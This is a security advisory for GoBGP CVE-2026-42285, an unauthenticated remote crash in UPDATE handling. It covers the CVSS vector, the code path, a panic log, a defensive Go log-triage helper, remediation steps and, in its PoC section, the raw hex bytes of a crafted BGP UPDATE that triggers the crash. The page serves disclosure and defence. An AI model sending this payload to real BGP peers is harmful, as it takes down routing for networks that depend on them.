
GoBGP CVE-2026-42285

HIGH
NULL Pointer Dereference (CWE-476)
2026-05-05 https://github.com/osrg/gobgp GHSA-p3w2-64xm-833j
CVSS 3.1: 7.5

CVSS Vector (NVD)

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
Attack Vector: Network
Attack Complexity: Low
Privileges Required: None
User Interaction: None
Scope: Unchanged
Confidentiality: None
Integrity: None
Availability: High

Lifecycle Timeline

Source Code Evidence Fetched: May 05, 2026 - 21:33 (vuln.today)
Analysis Generated: May 05, 2026 - 21:33 (vuln.today)

Description (NVD)

Summary

Remote Denial of Service (DoS) via Nil Pointer Dereference in BGP Update Processing

An unauthenticated remote BGP peer can trigger a fatal panic in GoBGP by sending a specially crafted BGP UPDATE message. When the server receives a message with inconsistent attribute lengths, it improperly handles the internal state transition to a "withdraw" action, leading to a nil pointer dereference in the AdjRib.Update function. This causes the entire GoBGP process to crash, resulting in a complete loss of service availability.

Details

The vulnerability originates in the interaction between the BGP message decoding logic and the Adj-RIB table management.

Triggering Condition: When a BGP UPDATE message contains attributes that fail validation (e.g., "attribute value length is short"), GoBGP logs a warning: "the received Update message was treated as withdraw".

Code Path:

The message reaches github.com/osrg/gobgp/v4/pkg/server.(*peer).handleUpdate.

Due to the malformed attributes, the message is processed as a withdrawal, but the internal representation of the path or its attributes becomes nil.

The execution flows to internal/pkg/table/adj.go:127 within (*AdjRib).Update.

The Flaw: At line 127 in adj.go, the code attempts to access a member of a structure (likely the path or a specific attribute container) that is nil due to the previous validation failure.

Log Snippet:

{"time":"2026-04-21T12:43:10.009107962+08:00","level":"WARN","msg":"the received Update message was treated as withdraw","Topic":"Peer","Key":"192.168.31.195","State":"BGP_FSM_ESTABLISHED","Error":"attribute value length is short"}
panic: runtime error: invalid memory address or nil pointer dereference
[signal SIGSEGV: segmentation violation code=0x1 addr=0x8 pc=0xbca9e8]

goroutine 52 [running]:
github.com/osrg/gobgp/v4/internal/pkg/table.(*AdjRib).Update(0x1fec929b4480, {0x1fec928ca0e8, 0x1, 0xfffffffffffffffc?})
        /home/base/Desktop/gobgp/internal/pkg/table/adj.go:127 +0xa8
github.com/osrg/gobgp/v4/pkg/server.(*peer).handleUpdate(0x1fec92b90c40, 0x1fec92c0c900)
        /home/base/Desktop/gobgp/pkg/server/peer.go:656 +0xed4
github.com/osrg/gobgp/v4/pkg/server.(*BgpServer).handleFSMMessage(0x1fec928c8488, 0x1fec92b90c40, 0x1fec92c0c900)
        /home/base/Desktop/gobgp/pkg/server/server.go:1670 +0x14c6
github.com/osrg/gobgp/v4/pkg/server.(*BgpServer).startFsmHandler.func1(0x1fec935c0b00?)
        /home/base/Desktop/gobgp/pkg/server/server.go:253 +0x25
github.com/osrg/gobgp/v4/pkg/server.(*fsmHandler).recvMessageloop(0x1fec92acee40, {0x105c750, 0x1fec92970500}, {0x106a558, 0x1fec933bc000}, 0x1fec92c1a2a0, 0x1fec92c18a10, 0x0?)
        /home/base/Desktop/gobgp/pkg/server/fsm.go:1893 +0xe82
created by github.com/osrg/gobgp/v4/pkg/server.(*fsmHandler).established in goroutine 37
        /home/base/Desktop/gobgp/pkg/server/fsm.go:1920 +0x2d5
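
An added example, not part of the advisory or of GoBGP's code: a log triage helper that ties a panic like the one above to the peer named in the warning logged just before it. The names FindCrashes and Finding are illustrative, and the sample input is constructed from the log lines on this page.

```go
package main

import (
	"bufio"
	"encoding/json"
	"fmt"
	"strings"
)

// Constructed sample: the WARN record, panic line and crashing frame from the log snippet above.
const sampleLog = `{"time":"2026-04-21T12:43:10.009107962+08:00","level":"WARN","msg":"the received Update message was treated as withdraw","Topic":"Peer","Key":"192.168.31.195","State":"BGP_FSM_ESTABLISHED","Error":"attribute value length is short"}
panic: runtime error: invalid memory address or nil pointer dereference
github.com/osrg/gobgp/v4/internal/pkg/table.(*AdjRib).Update(0x1fec929b4480, {0x1fec928ca0e8, 0x1, 0xfffffffffffffffc?})
`

const warnMsg = "the received Update message was treated as withdraw"
const crashFrame = "table.(*AdjRib).Update("

// Finding names the peer whose UPDATE was treated as withdraw just before the crash.
type Finding struct{ Peer, Error, Time string }

// FindCrashes reports each nil-dereference panic in (*AdjRib).Update, attributed to the last matching warning.
func FindCrashes(log string) (out []Finding) {
	unknown := Finding{Peer: "unknown"}
	last, inPanic := unknown, false
	sc := bufio.NewScanner(strings.NewReader(log))
	for sc.Scan() {
		line := strings.TrimSpace(sc.Text())
		switch {
		case strings.HasPrefix(line, "{"): // structured gobgpd log record
			var r struct{ Time, Msg, Key, Error string } // JSON keys match case-insensitively
			if json.Unmarshal([]byte(line), &r) == nil && r.Msg == warnMsg {
				last = Finding{r.Key, r.Error, r.Time}
			}
		case strings.HasPrefix(line, "panic:"):
			inPanic = strings.Contains(line, "nil pointer dereference")
		case inPanic && strings.Contains(line, crashFrame):
			out = append(out, last)
			last, inPanic = unknown, false
		}
	}
	return out
}

func main() {
	for _, f := range FindCrashes(sampleLog) {
		fmt.Printf("AdjRib.Update crash after malformed UPDATE from %s (%s) at %s\n", f.Peer, f.Error, f.Time)
	}
}
```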

PoC

[SEND] OPEN
       Data: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 1d 01 04 fd ea 00 5a c3 a8 1f c3 00
[RECV] Type: 1 | Length: 77
       Data: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 4d 01 04 fd e9 00 5a c0 a8 1f 82 30 02 2e 02 00 49 16 14 62 61 73 65 2d 76 69 72 74 75 61 6c 2d 6d 61 63 68 69 6e 65 00 01 04 00 19 00 46 41 04 00 00 fd e9 05 06 00 19 00 46 00 02
[+] Received OPEN from peer
[SEND] KEEPALIVE
       Data: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 13 04
[RECV] Type: 4 | Length: 19
       Data: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 13 04
[+] BGP Session Established
[SEND] Crafted UPDATE
       Data: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 50 02 00 04 18 ac 10 01 00 35 35 01 01 04 2d 02 00 90 0e 00 19 3e 01 a8 c0 1f 82 00 02 21 00 01 c0 a8 1f 12 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 00 11 22 33 44 55 0f 11 80 00
[*] Waiting for peer reaction...
[+] Done.

Impact

Remote Denial of Service (DoS) in GoBGP v4.4.0

Analysis (AI)

GoBGP v4.4.0 crashes with SIGSEGV panic when an unauthenticated remote BGP peer sends malformed UPDATE messages with inconsistent attribute lengths. The nil pointer dereference in AdjRib.Update (adj.go:127) causes complete process termination and loss of BGP service. …


Remediation (AI)

Within 24 hours: Identify all systems running GoBGP versions 4.4.0 and earlier using inventory tools or gobgpd -v checks; document BGP peers and topology dependencies.
Within 7 days: Upgrade affected GoBGP instances to v4.5.0 or later, testing in non-production first; coordinate upgrades during maintenance windows to minimize routing disruption. …

